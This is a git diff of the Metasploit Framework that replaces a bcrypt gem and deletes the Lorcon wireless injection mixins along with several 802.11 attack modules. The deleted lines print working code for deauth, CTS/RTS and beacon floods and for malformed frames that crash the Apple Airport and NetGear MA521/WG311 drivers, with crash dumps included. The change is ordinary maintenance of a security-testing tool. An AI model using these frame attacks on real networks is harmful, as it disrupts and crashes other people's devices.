diff --git a/Gemfile b/Gemfile index 4b6fad4025..c6f821cd4c 100755 --- a/Gemfile +++ b/Gemfile @@ -3,7 +3,7 @@ source 'https://rubygems.org' # Need 3+ for ActiveSupport::Concern gem 'activesupport', '>= 3.0.0' # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) -gem 'bcrypt-ruby' +gem 'bcrypt' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Needed by msfgui and other rpc components diff --git a/Gemfile.lock b/Gemfile.lock index 6bc1f62dac..379ea1cb81 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ GEM i18n (~> 0.6, >= 0.6.4) multi_json (~> 1.0) arel (3.0.2) - bcrypt-ruby (3.1.2) + bcrypt (3.1.7) builder (3.0.4) database_cleaner (1.1.1) diff-lcs (1.2.4) @@ -63,7 +63,7 @@ PLATFORMS DEPENDENCIES activerecord activesupport (>= 3.0.0) - bcrypt-ruby + bcrypt database_cleaner factory_girl (>= 4.1.0) fivemat (= 1.2.1) diff --git a/LICENSE b/LICENSE index eb9c447f67..ea38924130 100644 --- a/LICENSE +++ b/LICENSE @@ -176,7 +176,7 @@ Files: arel Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson License: MIT -Files: bcrypt-ruby +Files: bcrypt Copyright: 2007-2011 Coda Hale License: MIT diff --git a/lib/msf/core/exploit/lorcon.rb b/lib/msf/core/exploit/lorcon.rb deleted file mode 100644 index 8f2f2562a2..0000000000 --- a/lib/msf/core/exploit/lorcon.rb +++ /dev/null @@ -1,127 +0,0 @@ -# -*- coding: binary -*- -module Msf - -### -# -# This module provides methods for sending raw 802.11 frames using the ruby-lorcon extension. -# Please see the ruby-lorcon documentation for more information. -# -### - -module Exploit::Lorcon - - # - # Initializes an instance of an exploit module that accesses a 802.11 network - # - def initialize(info = {}) - super - - - default_intf = 'ath0' - default_driver = 'madwifing' - - - if (Rex::Compat.is_windows()) - # Default to the the first airpcap device on Windows - default_intf = "\\\\.\\airpcap00" - - # Default to the airpcap driver on Windows - default_driver = 'airpcap' - end - - register_options( - [ - OptString.new('INTERFACE', [true, 'The name of the wireless interface', default_intf]), - OptString.new('DRIVER', [true, 'The name of the wireless driver for lorcon', default_driver]), - OptInt.new('CHANNEL', [true, 'The default channel number', 11]), - OptInt.new('TXRATE', [true, 'The injected transmit rate', 2]), - OptEnum.new('TXMOD', [true, 'The injected modulation type', 'DSSS', %w{DEFAULT FHSS DSSS OFDM TURBO MIMO MIMOGF}]) - ], Msf::Exploit::Lorcon - ) - - - begin - - if(Rex::Compat.is_windows()) - airpcap = Rex::FileUtils.find_full_path("airpcap.dll") - if (not airpcap) - raise RuntimeError, "The airpcap.dll library must be installed" - end - end - - require 'Lorcon' - @lorcon_loaded = true - - rescue ::Exception => e - @lorcon_loaded = false - @lorcon_error = e - end - - end - - # - # Opens a handle to the specified wireless device - # - def open_wifi - - if (not @lorcon_loaded) - print_status("The Lorcon module is not available: #{@lorcon_error}") - raise RuntimeError, "Lorcon not available" - end - - # XXX: Force the interface to be up - system("ifconfig", datastore['INTERFACE'], "up") - - self.wifi = ::Lorcon::Device.new(datastore['INTERFACE'], datastore['DRIVER']) - if (not self.wifi) - raise RuntimeError, "Could not open the wireless device interface" - end - - # Configure the card for reliable injection - self.wifi.fmode = "INJECT" - self.wifi.channel = (datastore['CHANNEL'] || 11).to_i - - - # Configure modulation - begin - self.wifi.modulation = datastore['TXMOD'] - rescue ::ArgumentError => e - print_status("Warning: #{e}") - end - - # Configure the transmission rate - begin - self.wifi.txrate = datastore['TXRATE'].to_i if datastore['TXRATE'] - rescue ::ArgumentError => e - print_status("Warning: #{e}") - end - - self.wifi - end - - def close_wifi - self.wifi = nil - end - - # - # Converts ethernet addresses to binary - # - def eton(addr) - addr.split(':').map { |c| c.hex.chr }.join - end - - def channel - self.wifi.channel - end - - def next_channel - cur = self.wifi.channel - nxt = (cur > 10) ? 1 : cur + 1 - self.wifi.channel = nxt - end - - attr_accessor :wifi - -end - -end diff --git a/lib/msf/core/exploit/lorcon2.rb b/lib/msf/core/exploit/lorcon2.rb deleted file mode 100644 index 6d9622ee54..0000000000 --- a/lib/msf/core/exploit/lorcon2.rb +++ /dev/null @@ -1,141 +0,0 @@ -# -*- coding: binary -*- -module Msf - -### -# -# This module provides methods for sending raw 802.11 frames using the -# ruby-lorco2n extension. -# Please see the ruby-lorcon documentation for more information. -# -### - -module Exploit::Lorcon2 - - # - # Initializes an instance of an exploit module that accesses a 802.11 network - # - - def initialize(info = {}) - super - - default_intf = 'wlan0' - default_driver = 'autodetect' - - if (Rex::Compat.is_windows()) - # Default to the the first airpcap device on Windows - default_intf = "\\\\.\\airpcap00" - - # Default to the airpcap driver on Windows - default_driver = 'airpcap' - end - - register_options( - [ - OptString.new('INTERFACE', [true, 'The name of the wireless interface', default_intf]), - OptString.new('DRIVER', [true, 'The name of the wireless driver for lorcon', default_driver]), - OptInt.new('CHANNEL', [true, 'The initial channel', 11]), - ], Msf::Exploit::Lorcon2 - ) - - - begin - - if(Rex::Compat.is_windows()) - airpcap = Rex::FileUtils.find_full_path("airpcap.dll") - if (not airpcap) - raise RuntimeError, "The airpcap.dll library must be installed" - end - end - - require 'Lorcon2' - @lorcon_loaded = true - - rescue ::Exception => e - @lorcon_loaded = false - @lorcon_error = e - end - - end - - # - # Opens a handle to the specified wireless device - # - def open_wifi - - if (not @lorcon_loaded) - print_status("The Lorcon2 module is not available: #{@lorcon_error}") - raise RuntimeError, "Lorcon2 not available" - end - - if (datastore['DRIVER'] == "autodetect") - self.wifi = ::Lorcon::Device.new(datastore['INTERFACE']) - else - self.wifi = ::Lorcon::Device.new(datastore['INTERFACE'], datastore['DRIVER']) - end - - if (not self.wifi) - raise RuntimeError, "Could not initialize the wireless device interface" - end - - # Configure for injmon - self.wifi.openinjmon() or raise RuntimeError, "Could not open device in inject/monitor combo mode: " + self.wifi.error - - # Configure channel - self.wifi.channel = datastore['CHANNEL'] - - # TODO - add mod/rate once lorcon2 supports it - - self.wifi - end - - # - # This monstrosity works around a series of bugs in the interrupt - # signal handling of Ruby 1.9 and Lorcon2 - # - def each_packet(count=-1) - return if not wifi - begin - @wifi_count = 0 - reader = framework.threads.spawn("Lorcon2Receiver", false) do - wifi.each_packet(count.to_i) do |pkt| - yield(pkt) - @wifi_count += 1 - end - end - reader.join - rescue ::Exception - raise $! - ensure - reader.kill if reader.alive? - end - - @wifi_count - end - - def close_wifi - self.wifi = nil - end - - # - # Converts ethernet addresses to binary - # - def eton(addr) - addr.split(':').map { |c| c.hex.chr }.join - end - - def channel - self.wifi.channel - end - - def next_channel - cur = self.wifi.channel - nxt = (cur > 10) ? 1 : cur + 1 - self.wifi.channel = nxt - end - - attr_accessor :wifi - -end - -end - diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index d8310d238d..995d8d9ad2 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -71,8 +71,6 @@ require 'msf/core/exploit/dialup' require 'msf/core/exploit/dect_coa' # Networks -require 'msf/core/exploit/lorcon' -require 'msf/core/exploit/lorcon2' require 'msf/core/exploit/capture' # FileFormat diff --git a/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb b/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb deleted file mode 100644 index ee34dcef12..0000000000 --- a/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb +++ /dev/null @@ -1,162 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption', - 'Description' => %q{ - The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) - is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning - mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading - to arbitrary code execution. This vulnerability is triggered when a probe response frame is received - that does not contain valid information element (IE) fields after the fixed-length header. The data - following the fixed-length header is copied over internal kernel structures, resulting in memory - operations being performed on attacker-controlled pointer values. - }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2006-5710'], - ['OSVDB', '30180'], - ] - )) - register_options( - [ - OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), - OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) - end - - # - # This bug is easiest to trigger when the card has been placed into active scan mode: - # $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000 - # - - def run - open_wifi - - cnt = datastore['COUNT'].to_i - - print_status("Creating malicious probe response frame...") - frame = create_frame() - - print_status("Sending #{cnt} frames...") - cnt.times { wifi.write(frame) } - end - - def create_frame - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - caps = [rand(65535)].pack('n') - - frame = - "\x50" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - Rex::Text.rand_text(2) + # beacon interval - Rex::Text.rand_text(2) # capabilities - - frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4) - - return frame - - end -end - -=begin - -Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006) - -Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260 -Latest crash info for cpu 0: - Exception state (sv=0x3AA12A00) - PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access) - Backtrace: 0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 0x002CFA5C 0x000A9314 - Kernel loadable modules in backtrace (with dependencies): - com.apple.driver.AppleAirPort(3.4.4)@0x797000 - dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000 -Proceeding back via exception chain: - Exception state (sv=0x3AA12A00) - previously dumped as "Latest" state. skipping... - Exception state (sv=0x31F13A00) - PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown) - -Kernel version: -Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC - - - -(gdb) showcurrentstacks -task vm_map ipc_space #acts pid proc command -0x01a73dd8 0x00cdaf3c 0x01a68ef0 38 0 0x003fb200 kernel_task -activation thread pri state wait_queue wait_event -0x01a7c000 0x01a7c000 82 R -reserved_stack=0x173b0000 -kernel_stack=0x17440000 -stacktop=0x17443b60 -0x17443b60 0x1bc80ac -0x17443be0 0x7a1d48 -0x17443c60 0x79fa54 -0x17443ce0 0x79ff94 -0x17443d90 0x79febc -0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184> -0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104> -0x17443e90 0xa9314 -stackbottom=0x17443e90 - - -(gdb) x/3i $pc -0x7a2260 : lbz r8,0(r2) -0x7a2264 : addi r2,r2,1 -0x7a2268 : stw r2,0(r11) - -(gdb) i r $r2 -r2 0xdefacf7 233811191 - -(gdb) x/x $r11 -0x17443bb8: 0x0defacf7 - - -(gdb) bt -#0 0x007a2260 in mhp.1762 () -#1 0x007a1d48 in mhp.1762 () -warning: Previous frame identical to this frame (corrupt stack?) -#2 0x007a1d48 in mhp.1762 () -#3 0x0079fa54 in mhp.1762 () -#4 0x0079ff94 in mhp.1762 () -#5 0x0079febc in mhp.1762 () -#6 0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196 -#7 0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267 - - -(gdb) x/40x $r1 -0x17443b60: 0x17443be0 0x22424022 0x01bc80ac 0x00000038 -0x17443b70: 0x00d43c54 0x0004ffff 0x01bc81f4 0x00000210 -0x17443b80: 0x02275000 0x003d8000 0x004fa418 0x00365000 -0x17443b90: 0x01d803c0 0x00033e88 0x01a7c01c 0x01a7c0a4 -0x17443ba0: 0x0defaced 0x01bc8000 0x0227581e 0x0defacf7 -0x17443bb0: 0x00000000 0x0227581e 0x0defacf7 0x00000001 -0x17443bc0: 0x00000002 0x01bc81f4 0x00000000 0x00000000 -0x17443bd0: 0x17443c10 0x01a858c0 0x17443be0 0x01d80d40 -0x17443be0: 0x17443c60 0x01bc81f4 0x007a1d48 0x00000000 -0x17443bf0: 0x17443c20 0x00008088 0x01bc8000 0x0227581e - -=end diff --git a/modules/auxiliary/dos/wifi/cts_rts_flood.rb b/modules/auxiliary/dos/wifi/cts_rts_flood.rb deleted file mode 100644 index 4379dce61a..0000000000 --- a/modules/auxiliary/dos/wifi/cts_rts_flood.rb +++ /dev/null @@ -1,78 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info ={}) - super(update_info(info, - 'Name' => 'Wireless CTS/RTS Flooder', - 'Description' => %q{ - This module sends 802.11 CTS/RTS requests to a specific wireless peer, - using the specified source address, - }, - 'Author' => [ 'Brad Antoniewicz' ], - 'License' => MSF_LICENSE - )) - - register_options( - [ - OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]), - OptString.new('ADDR_SRC',[false, "Source MAC (not needed for CTS)"]), - OptString.new('TYPE',[true,"Type of Frame (RTS, CTS)",'RTS']), - OptInt.new('NUM',[true, "Number of frames to send",100]) - ],self.class) - end - - def run - case datastore['TYPE'].upcase - when 'RTS' - if (!datastore['ADDR_SRC']) - print_error("FAILED: RTS Flood selected but ADDR_SRC not set!") - return - end - frame = create_rts() - when 'CTS' - - frame = create_cts() - else - print_error("No TYPE selected!!") - return - end - - open_wifi - print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frames.....") - - datastore['NUM'].to_i.times do - wifi.write(frame) - end - - end - def create_rts - - frame = - "\xb4" + # Type/SubType - "\x00" + # Flags - "\xff\x7f" + # Duration - eton(datastore['ADDR_DST']) + # dst addr - eton(datastore['ADDR_SRC']) # src addr - - return frame - end - def create_cts - - frame = - "\xc4" + # Type/SubType - "\x00" + # Flags - "\xff\x7f" + # Duration - eton(datastore['ADDR_DST']) # dst addr - - return frame - end -end diff --git a/modules/auxiliary/dos/wifi/deauth.rb b/modules/auxiliary/dos/wifi/deauth.rb deleted file mode 100644 index d1ccfe0229..0000000000 --- a/modules/auxiliary/dos/wifi/deauth.rb +++ /dev/null @@ -1,65 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info ={}) - super(update_info(info, - 'Name' => 'Wireless DEAUTH Flooder', - 'Description' => %q{ - This module sends 802.11 DEAUTH requests to a specific wireless peer, - using the specified source address and source BSSID. - }, - - 'Author' => [ 'Brad Antoniewicz' ], - 'License' => MSF_LICENSE - )) - - register_options( - [ - OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]), - OptString.new('ADDR_SRC',[true, "Source MAC (e.g 00:DE:AD:BE:EF:00)"]), - OptString.new('ADDR_BSS',[true, "BSSID (e.g 00:DE:AD:BE:EF:00)"]), - OptInt.new('NUM',[true, "Number of frames to send",100]) - ],self.class) - end - - def run - - print_status("Creating Deauth frame with the following attributes:") - print_status("\tDST: #{datastore['ADDR_DST']}") - print_status("\tSRC: #{datastore['ADDR_SRC']}") - print_status("\tBSSID: #{datastore['ADDR_BSS']}") - - open_wifi - - print_status("Sending #{datastore['NUM']} frames.....") - - datastore['NUM'].to_i.times do - wifi.write(create_deauth()) - end - close_wifi - end - - def create_deauth - - seq = [rand(255)].pack('n') - frame = - "\xc0" + # Type/SubType - "\x00" + # Flags - "\x3a\x01" + # Duration - eton(datastore['ADDR_DST']) + # dst addr - eton(datastore['ADDR_SRC']) + # src addr - eton(datastore['ADDR_BSS']) + # BSSID - seq + # sequence number - "\x07\x00" # Reason Code (nonassoc. sta) - return frame - end -end diff --git a/modules/auxiliary/dos/wifi/fakeap.rb b/modules/auxiliary/dos/wifi/fakeap.rb deleted file mode 100644 index d0d489a4d3..0000000000 --- a/modules/auxiliary/dos/wifi/fakeap.rb +++ /dev/null @@ -1,90 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireless Fake Access Point Beacon Flood', - 'Description' => %q{ - This module can advertise thousands of fake access - points, using random SSIDs and BSSID addresses. Inspired - by Black Alchemy's fakeap tool. - }, - - 'Author' => [ 'hdm', 'kris katterjohn' ], - 'License' => MSF_LICENSE - )) - - register_options([ - OptInt.new('NUM', [false, "Number of beacons to send"]), - OptString.new('BSSID', [false, "Use this static BSSID (e.g. AA:BB:CC:DD:EE:FF)"]), - OptString.new('SSID', [false, "Use this static SSID"]) - ]) - end - - def run - open_wifi - print_status("Sending fake beacon frames...") - if datastore['NUM'].nil? or datastore['NUM'] == 0 - wifi.write(create_frame()) while true - else - datastore['NUM'].times { wifi.write(create_frame()) } - end - end - - def create_frame - - ssid = datastore['SSID'] || Rex::Text.rand_text_alpha(rand(31)+1) - if datastore['BSSID'] - bssid = eton(datastore['BSSID']) - else - bssid = Rex::Text.rand_text(6) - end - seq = [rand(255)].pack('n') - - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - "\xff\xff\xff\xff\xff\xff" + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - "\x00\x05" + # capability flags - - # ssid tag - "\x00" + ssid.length.chr + ssid + - - # supported rates - "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # current channel - "\x03" + "\x01" + datastore['CHANNEL'].to_i.chr + - - # traffic indication map - "\x05" + "\x04" + "\x00\x01\x02\x20" + - - # country information - "\x07" + "\x06" + "\x55\x53\x20\x01\x0b\x12" + - - # erp information - "\x2a" + "\x01" + "\x00" + - - # extended supported rates - "\x32" + "\x04" + "\x12\x24\x60\x6c" - - end - -end diff --git a/modules/auxiliary/dos/wifi/file2air.rb b/modules/auxiliary/dos/wifi/file2air.rb deleted file mode 100644 index 36cf74d999..0000000000 --- a/modules/auxiliary/dos/wifi/file2air.rb +++ /dev/null @@ -1,110 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireless Frame (File) Injector', - 'Description' => %q{ - Inspired by Josh Wright's file2air, this module writes - wireless frames from a binary file to the air, allowing - you to substitute some addresses before it gets sent. - Unlike the original file2air (currently v1.1), this module - *does* take into account the ToDS and FromDS flags in the - frame when replacing any specified addresses. - }, - # 11/03/2008 - 'Author' => 'kris katterjohn', - 'License' => MSF_LICENSE - )) - - register_options([ - OptString.new('FILE', [true, 'Filename to write to the air']), - OptString.new('ADDR_DST', [false, 'Target MAC (e.g. 00:DE:AD:BE:EF:00)']), - OptString.new('ADDR_SRC', [false, 'Source MAC (e.g. 00:DE:AD:BE:EF:00)']), - OptString.new('BSSID', [false, 'BSSID (e.g. 00:DE:AD:BE:EF:00)']), - OptInt.new('NUM', [true, 'Number of frames to send', 1]) - ], self.class) - end - - def run - begin - frame = File.read(datastore['FILE']) - rescue ::Exception - print_status("Couldn't read from \"#{datastore['FILE']}\": #{$!}") - return - end - - # Sending too much data can cause local problems, even if it's - # less than the 802.11 MTU. Gotta draw the line somewhere. - if frame.length < 10 or frame.length > 1800 - print_status("Invalid frame size (should be 10-1800 bytes)") - return - end - - if datastore['BSSID'] or datastore['ADDR_DST'] or datastore['ADDR_SRC'] - if not substaddrs(frame) - print_status("This module doesn't support modifying frames with both ToDS and FromDS set") - return - end - end - - open_wifi - - print_status("Writing out #{datastore['NUM']} frames...") - - datastore['NUM'].times do - wifi.write(frame) - end - - close_wifi - end - - def substaddrs(frame) - tods = (frame[1] & 1) == 1 - fromds = (frame[1] & 2) == 2 - - if tods - if fromds - # Not going to handle this 4-address special-case - return nil - else - substaddr1(frame, datastore['BSSID']) - substaddr2(frame, datastore['ADDR_SRC']) - substaddr3(frame, datastore['ADDR_DST']) - end - else - if fromds - substaddr1(frame, datastore['ADDR_DST']) - substaddr2(frame, datastore['BSSID']) - substaddr3(frame, datastore['ADDR_SRC']) - else - substaddr1(frame, datastore['ADDR_DST']) - substaddr2(frame, datastore['ADDR_SRC']) - substaddr3(frame, datastore['BSSID']) - end - end - - true - end - - def substaddr1(frame, addr) - frame[4,6] = eton(addr) if addr - end - - def substaddr2(frame, addr) - frame[10,6] = eton(addr) if addr - end - - def substaddr3(frame, addr) - frame[16,6] = eton(addr) if addr - end -end diff --git a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb deleted file mode 100644 index 3a860c5929..0000000000 --- a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb +++ /dev/null @@ -1,118 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow', - 'Description' => %q{ - This module exploits a buffer overflow in the NetGear MA521 wireless device - driver under Windows XP. When a specific malformed frame (beacon or probe response) - is received by the wireless interface under active scanning mode, the MA521nd5.SYS - driver attempts to write to an attacker-controlled memory location. The vulnerability - is triggered by an invalid supported rates information element. - - This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a - NetGear MA521 Cardbus adapter. A remote code execution module is also in development. - - This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation - (external/ruby-lorcon/README) for more information. - }, - 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2006-6059'], - ['OSVDB', '30507'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'], - ['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip'] - ] - )) - register_options( - [ - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]), - OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF']) - ], self.class) - end - - def run - - open_wifi - - stime = Time.now.to_i - rtime = datastore['RUNTIME'].to_i - count = 0 - - print_status("Creating malicious beacon frame...") - - frame = create_beacon() - - print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...") - - while (stime + rtime > Time.now.to_i) - wifi.write(frame) - select(nil, nil, nil, 0.10) if (count % 100 == 0) - count += 1 - end - - print_status("Completed sending #{count} beacons.") - end - - def create_beacon - ssid = Rex::Text.rand_text(6) - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - "\x01\x00" + # capabilities - - # ssid IE - "\x00" + ssid.length.chr + ssid + - - # supported rates IE overflow - "\x01" + "\xFF" + ("\x41" * 255) + - - # channel IE - "\x03" + "\x01" + channel.chr - - return frame - - end -end - -=begin -******************************************************************************* -* * -* Bugcheck Analysis * -* * -******************************************************************************* - -DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) -An attempt was made to access a pageable (or completely invalid) address at an -interrupt request level (IRQL) that is too high. This is usually -caused by drivers using improper addresses. -If kernel debugger is available get stack backtrace. -Arguments: -Arg1: 41414141, memory referenced -Arg2: 00000002, IRQL -Arg3: 00000000, value 0 = read operation, 1 = write operation -Arg4: aa1ec75a, address which referenced memory -=end diff --git a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb deleted file mode 100644 index f84b60c261..0000000000 --- a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb +++ /dev/null @@ -1,116 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'NetGear WG311v1 Wireless Driver Long SSID Overflow', - 'Description' => %q{ - This module exploits a buffer overflow in the NetGear WG311v1 wireless device - driver under Windows XP and 2000. A kernel-mode heap overflow occurs - when malformed probe response frame is received that contains a long SSID field - - This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a - NetGear WG311v1 PCI card. A remote code execution module is also in development. - - This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation - (external/ruby-lorcon/README) for more information. - }, - 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2006-6125'], - ['OSVDB', '30511'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'], - ['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'], - ] - )) - register_options( - [ - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]), - OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) - end - - def run - - open_wifi - - stime = Time.now.to_i - rtime = datastore['RUNTIME'].to_i - count = 0 - - print_status("Creating malicious probe response frame...") - - frame = create_probe_response() - - print_status("Sending malicious probe response frames for #{datastore['RUNTIME']} seconds...") - - while (stime + rtime > Time.now.to_i) - wifi.write(frame) - select(nil, nil, nil, 0.10) if (count % 100 == 0) - count += 1 - end - - print_status("Completed sending #{count} probe responses.") - end - - def create_probe_response - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - - frame = - "\x50" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - "\x01\x00" + # capabilities - - # SSID IE overflow - "\x00" + "\xff" + ("\x41" * 255) + - - # supported rates IE - "\x01" + "\x08" + "\x02\x04\x0b\x16\x0c\x18\x30\x48" + - - # channel IE - "\x03" + "\x01" + channel.chr - - return frame - - end -end - -=begin -******************************************************************************* -* * -* Bugcheck Analysis * -* * -******************************************************************************* - -BAD_POOL_HEADER (19) -The pool is already corrupt at the time of the current request. -This may or may not be due to the caller. -The internal pool links must be walked to figure out a possible cause of -the problem, and then special pool applied to the suspect tags or the driver -verifier to a suspect driver. -Arguments: -Arg1: 00000020, a pool block header size is corrupt. -Arg2: 81cae7b0, The pool entry we were looking for within the page. -Arg3: 81cae8c8, The next pool entry. -Arg4: 0a23002b, (reserved) -=end diff --git a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb deleted file mode 100644 index ba35201cb6..0000000000 --- a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb +++ /dev/null @@ -1,74 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response', - 'Description' => %q{ - This module exploits a firmware-level vulnerability in a variety of - 802.11b devices. This attack works by sending a probe response frame - containing a NULL SSID information element to an affected device. This - flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere, - Orinoco, and the first generation of Airport cards). - }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'], - ['WVE', '2006-0064'] - ] - )) - register_options( - [ - OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), - OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) - end - - def run - open_wifi - - cnt = datastore['COUNT'].to_i - - print_status("Creating malicious probe response frame...") - frame = create_frame() - - print_status("Sending #{cnt} frames...") - cnt.times { wifi.write(frame) } - 